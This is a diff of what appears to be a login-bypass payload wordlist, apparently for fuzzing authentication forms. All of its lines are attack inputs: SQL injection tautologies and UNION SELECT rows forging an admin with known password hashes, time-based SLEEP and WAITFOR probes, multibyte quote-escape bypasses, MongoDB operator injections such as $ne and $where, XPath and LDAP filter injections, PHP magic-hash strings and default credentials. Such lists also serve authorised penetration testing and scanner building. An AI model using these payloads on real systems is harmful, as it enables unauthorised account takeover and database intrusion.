+' or '1'='1'/*
+' or '1′='1
+' or 'one'='one
+' or 'one'='one–
+' or 'x'='x
+' or /* or '
+' or 0=0 #
+' or 0=0 --
+' or 0=0 –
+' or 1 or '
+' or 1=1
+' or 1=1 --
+' or 1=1 LIMIT 1;#
 ' or 1=1 limit 1 -- -+
+' or 1=1 –
+' or 1=1#
+' or 1=1--
+' or 1=1/*
+' or 1=1;#
+' or 1=1–
+' or 1]%00
+' or a=a--
+' or a=a–
+' or true() or '
+' or true--
+' or uid like '%
+' or uname like '%
+' or user like '%
+' or userid like '%
+' or username like '%
+' } ], $comment:'successful MongoDB injection'
+' –
+'#
+'%20%26%26%20this.password.match(/.*/)//+%00
+'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+'&'
+'&''#
+'&''-- 2
+'&''/*
+')
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2-- 2
+') or '1'='1
+') or '1'='1'#
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1--
+') or ('1'='1
+') or ('1'='1'#
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1--
+') or ('a'='a and hi") or ("a"="a
+') or ('x')=('x
+') or ('x'='x
+') or true--
+')#
+')&''#
+')&''-- 2
+')&''/*
+')&('
+')) or (('x'))=(('x
+')*''#
+')*''-- 2
+')*''/*
+')*('
+')-''#
+')-''-- 2
+')-''/*
+')-('
+')-- 2
+')/*
+')=''#
+')=''-- 2
+')=''/*
+')=('
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)#
+')UniON(SElecT(1),2,3,4,5)-- 2
+')^''#
+')^''-- 2
+')^''/*
+')^('
+')oR 2 oR('
+')oR 2#
+')oR 2-- 2
+')oR 2/*
+')oR 2=2 oR('
+')oR 2=2#
+')oR 2=2-- 2
+')oR 2=2/*
+')oR true oR('
+')oR true#
+')oR true-- 2
+')oR true/*
+')oR'2'#
+')oR'2'-- 2
+')oR'2'/*
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1/*
+')oR'2'='2'#
+')oR'2'='2'-- 2
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR'2'=('2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR'2'LiKE('2
+')oR'2'oR('
+')oR('2
+')oR(2)#
+')oR(2)-- 2
+')oR(2)/*
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)/*
+')oR(2)=(2)oR('
+')oR(2)=2#
+')oR(2)=2-- 2
+')oR(2)=2/*
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+')oR(2)oR('
+')oR(true)#
+')oR(true)-- 2
+')oR(true)/*
+')oR(true)oR('
+')oR/**/2#
+')oR/**/2-- 2
+')oR/**/2/*
+')oR/**/2/**/oR('
+')oR/**/2=2#
+')oR/**/2=2-- 2
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR/**/true#
+')oR/**/true-- 2
+')oR/**/true/*
+')oR/**/true/**/oR('
+')||'2'='2'||('
+')||'2'=('2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||'2'LiKE('2
+')||'2'||('
+')||('2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+')||2#
+')||2-- 2
+')||2/*
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)/*
+')||2=2#
+')||2=2-- 2
+')||2=2/*
+')||2=2||('
+')||2||('
+')||true#
+')||true-- 2
+')||true/*
+')||true||('
+'*'
+'*''#
+'*''-- 2
+'*''/*
+', $or: [ {}, { 'a':'a
+', $where: '1 == 1'
+'-'
+'-''#
+'-''-- 2
+'-''/*
+'--
+'-- 2
+'/*
+';return 'a'=='a' && ''=='
 '="or'
+'='
+'=' 'or' and '=' 'or'
+'=''#
+'=''-- 2
+'=''/*
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)#
+'UniON(SElecT(1),2,3,4,5)-- 2
+'^'
+'^''#
+'^''-- 2
+'^''/*
+'oR 2 oR'
+'oR 2#
+'oR 2-- 2
+'oR 2/*
+'oR 2=2 oR'
+'oR 2=2#
+'oR 2=2-- 2
+'oR 2=2/*
+'oR true oR'
+'oR true#
+'oR true-- 2
+'oR true/*
+'oR'2
+'oR'2'#
+'oR'2'-- 2
+'oR'2'/*
+'oR'2'='2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1/*
+'oR'2'='2'#
+'oR'2'='2'-- 2
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR'2'LiKE'2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR'2'oR'
+'oR(2)#
+'oR(2)-- 2
+'oR(2)/*
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)/*
+'oR(2)=(2)oR'
+'oR(2)=2#
+'oR(2)=2-- 2
+'oR(2)=2/*
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+'oR(2)oR'
+'oR(true)#
+'oR(true)-- 2
+'oR(true)/*
+'oR(true)oR'
+'oR/**/2#
+'oR/**/2-- 2
+'oR/**/2/*
+'oR/**/2/**/oR'
+'oR/**/2=2#
+'oR/**/2=2-- 2
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR/**/true#
+'oR/**/true-- 2
+'oR/**/true/*
+'oR/**/true/**/oR'
+'or 1=1 or ''='
+'or contains(.,'adm') or'
+'or contains(name,'adm') or'
+'or position()=2 or'
+'or string-length(name(.))<10 or'
+'or'1=1
+'or'1=1′
+'||'2
+'||'2'='2
+'||'2'='2'||'
+'||'2'LiKE'2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||'2'||'
+'||(2)LiKE(2)#
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+'||2#
+'||2-- 2
+'||2/*
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)/*
+'||2=2#
+'||2=2-- 2
+'||2=2/*
+'||2=2||'
+'||2||'
+'||true#
+'||true-- 2
+'||true/*
+'||true||'
+) or '1′='1–
+) or ('1′='1–
+*
+*)(&
+*)(|(&
+*)(|(*
+*))%00
+, $where: '1 == 1'
+0"&lt;"2
+0"&lt;"2"#
+0"&lt;"2"-- 2
+0"&lt;"2"/*
+0")&lt;"2#
+0")&lt;"2-- 2
+0")&lt;"2/*
+0")&lt;("2
+0'&lt;'2
+0'&lt;'2'#
+0'&lt;'2'-- 2
+0'&lt;'2'/*
+0')&lt;'2'#
+0')&lt;'2'-- 2
+0')&lt;'2'/*
+0')&lt;('2
+0;return true
+1, $where: '1 == 1'
+1234
+1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+123456
+1′) and '1′='1–
+240610708
+=
+==
+ADMIN
+ADMIN"--
+ADMIN'--
+ADMIN'oR'1'='1
+AdMiN
+AdMiN"--
+AdMiN'--
+AdMiN'oR'1'='1
 Pass1234.
-Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
-Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
-Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
-Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
-Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
-Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
-Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
-Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
-Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
-Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
 Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
 Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
 Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
 Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
+Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
+Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
 Pass1234." and 1=0 union select "admin",sha("Pass1234.
 Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
-%A8%27 Or 1=1-- 2
-%8C%A8%27 Or 1=1-- 2
-%bf' Or 1=1 -- 2
-%A8%27 Or 1-- 2
-%8C%A8%27 Or 1-- 2
-%bf' Or 1-- 2
-%A8%27Or(1)-- 2
-%8C%A8%27Or(1)-- 2
-%bf'Or(1)-- 2
-%A8%27||1-- 2
-%8C%A8%27||1-- 2
-%bf'||1-- 2
-%A8%27) Or 1=1-- 2
-%8C%A8%27) Or 1=1-- 2
-%bf') Or 1=1 -- 2
-%A8%27) Or 1-- 2
-%8C%A8%27) Or 1-- 2
-%bf') Or 1-- 2
-%A8%27)Or(1)-- 2
-%8C%A8%27)Or(1)-- 2
-%bf')Or(1)-- 2
-%A8%27)||1-- 2
-%8C%A8%27)||1-- 2
-%bf')||1-- 2
-240610708
-true, $where: '1 == 1'
-, $where: '1 == 1'
-$where: '1 == 1'
-', $where: '1 == 1'
-1, $where: '1 == 1'
-{ $ne: 1 }
-', $or: [ {}, { 'a':'a
-' } ], $comment:'successful MongoDB injection'
+Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
+Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
+Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
+Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
+Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
+Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
+Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
+Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#
+QNKCDZO
+[$ne]=1
+[$ne]=toto
+[$regex]=a.*
+\u0041dmin
+\u0061\u0064\u006d\u0069\u006e
+\u0061dmin
+\u0070assword
+\uFF41dmin
+_admin
+a%min
+aDmIn
+aDmIn"#
+aDmIn'#
+a_min
+aaaaaaaaaaaaaaaa
+aabg7XSs
+ad\u006din
+admin
+admin" #
+admin" --
+admin" or "1"="1
+admin" or "1"="1"#
+admin" or "1"="1"--
+admin" or "1"="1"/*
+admin" or 1=1
+admin" or 1=1#
+admin" or 1=1--
+admin" or 1=1/*
+admin"#
+admin") AND "x"="x
+admin") AND SLEEP(5)--
+admin") or "1"="1
+admin") or "1"="1"#
+admin") or "1"="1"--
+admin") or "1"="1"/*
+admin") or ("1"="1
+admin") or ("1"="1"#
+admin") or ("1"="1"--
+admin") or ("1"="1"/*
+admin")#
+admin")-- 2
+admin"-- 2
+admin"/*
+admin"or 1=1 or ""="
+admin%
+admin%00
+admin%00"--
+admin%00' OR '1'='1
+admin%00'--
+admin%09
+admin%0a
+admin%0d
+admin%20
+admin%2b
+admin' #
+admin' --
+admin' AND 'x'<>'y
+admin' AND 1<2--
+admin' AND 2>1--
+admin' AND 3<>4#
+admin' AND ASCII('a')=97--
+admin' AND BENCHMARK(1000000,MD5('test'))--
+admin' AND EXISTS(SELECT * FROM users)--
+admin' AND LENGTH('a')=1--
+admin' AND NOT EXISTS(SELECT * FROM fake_table)--
+admin' AND SLEEP(10)#
+admin' AND SLEEP(5)--
+admin' AND pg_sleep(5)--
+admin' UNION SELECT IF(1=1,SLEEP(5),0)--
+admin' WAITFOR DELAY '0:0:10'#
+admin' WAITFOR DELAY '0:0:5'--
+admin' and substring(password/text(),1,1)='7
+admin' or '
+admin' or '1'='1
+admin' or '1'='1'#
+admin' or '1'='1'--
+admin' or '1'='1'/*
+admin' or '1'='2
+admin' or 1=1
+admin' or 1=1#
+admin' or 1=1--
+admin' or 1=1/*
+admin'#
+admin') AND 'x'='x
+admin') AND SLEEP(5)--
+admin') or '1'='1
+admin') or '1'='1'#
+admin') or '1'='1'--
+admin') or '1'='1'/*
+admin') or ('1'='1
+admin') or ('1'='1'#
+admin') or ('1'='1'--
+admin') or ('1'='1'/*
+admin')#
+admin')-- 2
+admin')/*
+admin'-- 2
+admin'/*
+admin'; SELECT pg_sleep(10)--
+admin'or 1=1 or ''='
+admin)(!(&(|
+admin)(&)
+admin))(|(|
+admin+
+admin00000000000
+admin\0
+admin\0' OR '1'='1
+admin\x00
+admin\x00'--
+admin\x00\x00\x00\x00
+admin_
+adminxxxxxxxxxxx
+and 1=1
+and 1=1–
 db.injection.insert({success:1});
 db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
-|| 1==1
-' && this.password.match(/.*/)//+%00
-' && this.passwordzz.match(/.*/)//+%00
-'%20%26%26%20this.password.match(/.*/)//+%00
-'%20%26%26%20this.passwordzz.match(/.*/)//+%00
+ffifdyop
+guest
+like '%'
+or 0=0 #
+or 0=0 --
+or 0=0 –
+or 1=1
+or 1=1#
+or 1=1--
+or 1=1/*
+or 1=1–
+or true
+or true--
+password
+password%00
+password\x00
+pwd
+pwd)
+pwd))
+root
+test
+toor
+true, $where: '1 == 1'
+{ $ne: 1 }
+{"$gt": undefined}
+{"$ne": "bar"}
+{"$ne": null}
 {$gt: ''}
-[$ne]=1
-';return 'a'=='a' && ''=='
-";return(true);var xyz='a
-0;return true
-
+|| 1==1